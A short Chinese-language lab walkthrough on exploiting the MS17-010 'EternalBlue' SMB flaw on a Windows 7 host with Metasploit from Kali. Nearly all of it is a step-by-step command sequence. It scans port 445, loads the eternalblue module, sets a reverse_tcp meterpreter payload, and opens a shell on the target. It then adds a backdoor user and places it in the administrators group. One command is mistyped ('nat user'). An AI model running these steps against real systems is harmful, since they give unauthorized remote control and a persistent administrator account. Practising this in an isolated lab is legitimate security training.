准备工作
查看目标IP地址和445端口
使用ipconfig查看Win7IP地址
在Kali上使用nmap 192.168.79.145命令查看win7445端口是否打开。(这里如果无法访问目标IP,请检查目标防火墙是否关闭或者是否允许访问)
打开Metasploit框架
使用msfconsole命令,进入msf6界面即算成功。(这是一款集合各种漏洞和后期利用工具的框架)
使用MS17-010漏洞
搜索MS17-010漏洞search ms17_010,找到“永恒之蓝”漏洞(第1条eternalblue)
打开漏洞use exploit/windows/smb/ms17_010_eternalblue
设置相关参数
set rhost 192.168.79.145 //设置目标主机
set payload windows/x64/meterpreter/reverse_tcp //设置攻击载体(简单来说就是,如果不使用这个模块,攻击成功之后,就是一个简单的shell,使用这个载体,攻击成功之后可以使用这个模块自带的各种攻击模块)。
set lhost 192.168.1.109 //设置本机ip地址(用来攻击成功之后,监听被开放的目标电脑的端口)
设置好后使用show options查看参数是否设置成功
攻击目标
使用run运行攻击程序
进入meterpreter界面就算攻击成功(这里出现了报错,网上说是目标机有其他安全防护,本目标机没有其他安全防护,且攻击指令能够正常运行,不予管理)
使用shell进入目标机操作系统
这里出现乱码,可以使用chcp 65001解决(这里可以看到已经进入目标主机,并且查看到目标用户)
使用
nat user zhangsan /add #创建zhangsan用户
这里可以看到zhangsan用户已经被添加到目标用户。
将zhangsan添加到管理员组
net localgroup administrators zhangsan /add #将zhangsan加入管理员用户组
之后便可以进行各种操作。